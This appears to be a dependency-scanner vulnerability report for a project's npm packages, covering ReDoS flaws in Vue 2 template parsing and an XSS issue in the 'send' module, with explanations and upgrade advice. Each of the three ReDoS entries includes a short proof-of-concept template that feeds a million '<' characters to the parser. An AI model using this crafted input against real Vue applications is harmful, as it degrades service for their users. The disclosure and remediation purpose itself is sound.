Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rete-vue-render-plugin@0.5.2 › vue@2.7.16 › @vue/compiler-sfc@2.7.16
Overview
@vue/compiler-sfc is a @vue/compiler-sfc
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) through the parseHTML
function in html-parser.ts
. An attacker can cause the application to consume excessive resources by supplying a specially crafted input that triggers inefficient regular expression evaluation.
PoC
Within Vue 2 client-side application code, create a new Vue instance with a template string that includes a <script>
node tag that has a different closing tag (in this case </textarea>
).
new Vue({
el: '#app',
template: '
<div>
Hello, world!
<script>${'<'.repeat(1000000)}</textarea>
</div>'
});
Set up an index.html
file that loads the above JavaScript and then mount the newly created Vue instance with mount()
.
<!DOCTYPE html>
<html>
<head>
<title>My first Vue app</title>
</head>
<body>
<div id="app">
Loading..
</div>
</body>
</html>
In a browser, visit your Vue application
http://localhost:3000
In the browser, observe how the ReDoS vulnerability is able to increase the amount of time it takes for the page to parse the template and mount your Vue application. This demonstrates the ReDoS vulnerability.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade @vue/compiler-sfc
to version 3.0.0-alpha.0 or higher.
References
low severity
- Vulnerable module: send
- Introduced through: restify@8.6.1
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › restify@8.6.1 › send@0.16.2
Overview
send is a Better streaming static file server with Range and conditional-GET support
Affected versions of this package are vulnerable to Cross-site Scripting due to improper user input sanitization passed to the SendStream.redirect()
function, which executes untrusted code. An attacker can execute arbitrary code by manipulating the input parameters to this method.
Note:
Exploiting this vulnerability requires the following:
The attacker needs to control the input to
response.redirect()
Express MUST NOT redirect before the template appears
The browser MUST NOT complete redirection before
The user MUST click on the link in the template
Details
A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <
can be coded as <
; and >
can be coded as >
; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <
and >
as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
Type | Origin | Description |
---|---|---|
Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?
,&
,/
,<
,>
and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
Upgrade send
to version 0.19.0, 1.1.0 or higher.
References
low severity
- Vulnerable module: vue
- Introduced through: rete-context-menu-plugin@0.6.0, vue@2.7.16 and others
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rete-context-menu-plugin@0.6.0 › vue@2.5.17Remediation: Upgrade to rete-context-menu-plugin@2.0.0.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › vue@2.7.16Remediation: Upgrade to vue@3.0.0.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rete-vue-render-plugin@0.5.2 › vue@2.7.16
Overview
vue is an open source project with its ongoing development made possible entirely by the support of these awesome backers.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) through the parseHTML
function in html-parser.ts
. An attacker can cause the application to consume excessive resources by supplying a specially crafted input that triggers inefficient regular expression evaluation.
PoC
Within Vue 2 client-side application code, create a new Vue instance with a template string that includes a <script>
node tag that has a different closing tag (in this case </textarea>
).
new Vue({
el: '#app',
template: '
<div>
Hello, world!
<script>${'<'.repeat(1000000)}</textarea>
</div>'
});
Set up an index.html
file that loads the above JavaScript and then mount the newly created Vue instance with mount()
.
<!DOCTYPE html>
<html>
<head>
<title>My first Vue app</title>
</head>
<body>
<div id="app">
Loading..
</div>
</body>
</html>
In a browser, visit your Vue application
http://localhost:3000
In the browser, observe how the ReDoS vulnerability is able to increase the amount of time it takes for the page to parse the template and mount your Vue application. This demonstrates the ReDoS vulnerability.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade vue
to version 3.0.0-alpha.0 or higher.
References
low severity
- Vulnerable module: vue-template-compiler
- Introduced through: vue-template-compiler@2.7.16
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › vue-template-compiler@2.7.16
Overview
vue-template-compiler is a template compiler for Vue 2.0
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) through the parseHTML
function in html-parser.ts
. An attacker can cause the application to consume excessive resources by supplying a specially crafted input that triggers inefficient regular expression evaluation.
PoC
Within Vue 2 client-side application code, create a new Vue instance with a template string that includes a <script>
node tag that has a different closing tag (in this case </textarea>
).
new Vue({
el: '#app',
template: '
<div>
Hello, world!
<script>${'<'.repeat(1000000)}</textarea>
</div>'
});
Set up an index.html
file that loads the above JavaScript and then mount the newly created Vue instance with mount()
.
<!DOCTYPE html>
<html>
<head>
<title>My first Vue app</title>
</head>
<body>
<div id="app">
Loading..
</div>
</body>
</html>
In a browser, visit your Vue application
http://localhost:3000
In the browser, observe how the ReDoS vulnerability is able to increase the amount of time it takes for the page to parse the template and mount your Vue application. This demonstrates the ReDoS vulnerability.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
There is no fixed version for vue-template-compiler
.